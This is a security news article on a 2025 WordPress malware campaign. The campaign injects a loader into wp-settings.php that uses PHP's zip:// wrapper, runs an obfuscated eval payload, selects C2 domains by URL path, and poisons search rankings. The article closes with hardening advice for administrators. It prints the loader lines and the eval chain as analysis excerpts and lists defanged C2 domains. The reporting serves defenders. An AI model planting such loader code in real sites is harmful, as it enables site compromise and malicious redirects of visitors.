In July 2025, cybersecurity researchers identified a sophisticated malware campaign targeting WordPress websites. This campaign employs advanced obfuscation techniques and stealthy persistence methods to redirect unsuspecting visitors to malicious domains while simultaneously conducting search engine optimization (SEO) poisoning operations.
Initial Compromise and Code Injection
The attack begins with the compromise of WordPress core files, specifically targeting the critical `wp-settings.php` component. Once access is gained, attackers inject malicious code that leverages PHP’s `zip://` wrapper functionality to execute hidden payloads. This approach allows the malware to remain virtually undetected by traditional security scanners, as the malicious code is stored within what appears to be an innocuous ZIP archive file named `win.zip`.
Malware Objectives and SEO Manipulation
Beyond simple redirection schemes, the malware orchestrates a comprehensive attack on search engine rankings through unauthorized content injection, sitemap manipulation, and the creation of spam-laden pages designed to boost malicious websites in search results. The infection demonstrates remarkable sophistication in its ability to differentiate between human visitors and automated bots, ensuring that search engine crawlers encounter benign content while real users are subjected to malicious redirects.
Discovery and Analysis
Sucuri analysts identified the malware after investigating persistent redirect issues reported by a client, leading to the discovery of this multi-layered threat. The researchers noted that the malware employs dynamic Command and Control (C2) server selection, with different C2 domains activated based on specific URL patterns accessed by visitors.
ZIP Archive Inclusion Mechanism
The malware’s most innovative feature lies in its exploitation of PHP’s `zip://` stream wrapper for code inclusion. The initial payload, injected into `wp-settings.php`, contains two critical lines that establish the infection framework:
“`php
$h = str_replace(‘www.’, ”, $_SERVER[‘HTTP_HOST’]);
include(‘zip://win.zip#’ . $h);
“`
This code extracts the domain name from the `HTTP_HOST` header and uses it to include a file directly from within the `win.zip` archive. This technique bypasses traditional file-based detection methods since the malicious code resides within a compressed container rather than as standalone PHP files.
Obfuscation and Persistence
Upon extraction, the ZIP archive reveals heavily obfuscated PHP code structured as:
“`php
$encode=$b3($string);
$string1=$b2($b4($encode));
echo eval(?> . $string1);
“`
The malware establishes persistence through environment manipulation, setting extended execution timeouts and implementing anti-bot detection mechanisms. It dynamically selects from multiple C2 servers, including domains such as `wditemqy[.]enturbioaj[.]xyz` and `oqmetrix[.]icercanokt[.]xyz`, depending on the requested URL path. This distributed C2 architecture enhances the malware’s resilience against takedown efforts while enabling targeted content delivery based on visitor behavior patterns.
Broader Context of WordPress Exploitation
This incident is part of a broader trend where threat actors exploit vulnerabilities in WordPress websites to distribute malware. For instance, in October 2024, over 6,000 WordPress sites were hacked to install malicious plugins that displayed fake software updates, leading to the installation of information-stealing malware. These campaigns, known as ClearFake and ClickFix, utilized stolen admin credentials to install plugins that appeared legitimate but contained embedded malicious scripts. ([bleepingcomputer.com](https://www.bleepingcomputer.com/news/security/over-6-000-wordpress-hacked-to-install-plugins-pushing-infostealers/?utm_source=openai))
Similarly, in January 2022, a massive supply chain attack compromised 93 WordPress themes and plugins, inserting a backdoor that granted threat actors full access to websites. This attack affected over 360,000 active websites and was discovered by researchers at Jetpack. ([bleepingcomputer.com](https://www.bleepingcomputer.com/news/security/over-90-wordpress-themes-plugins-backdoored-in-supply-chain-attack/?utm_source=openai))
In April 2025, a new malware variant disguised as a legitimate WordPress plugin was uncovered. Named WP-antymalwary-bot.php, this malware provided attackers with persistent access to infected websites, allowing them to inject malicious code and serve remote advertisements to site visitors. The malware maintained persistence through a modified `wp-cron.php` file, which reinstated the malicious plugin if deleted. ([infosecurity-magazine.com](https://www.infosecurity-magazine.com/news/wordpress-malware-masquerades/?utm_source=openai))
Recommendations for WordPress Administrators
Given the increasing sophistication of these attacks, WordPress administrators are advised to:
– Regularly Audit Installed Plugins and Themes: Ensure that all plugins and themes are up-to-date and obtained from reputable sources. Remove any unused or suspicious files.
– Monitor for Unauthorized Changes: Implement file integrity monitoring solutions to detect unexpected modifications to core files.
– Enhance Access Controls: Use strong admin credentials, enable multi-factor authentication (MFA), and limit the number of users with administrative privileges.
– Implement Security Plugins and Firewalls: Utilize security plugins that can detect and block malicious activities, and configure web application firewalls to filter out malicious traffic.
– Conduct Regular Backups: Maintain routine off-site backups to ensure quick recovery in case of an attack.
By adopting these proactive security measures, website administrators can significantly reduce the risk of their WordPress sites being compromised by such sophisticated malware campaigns.
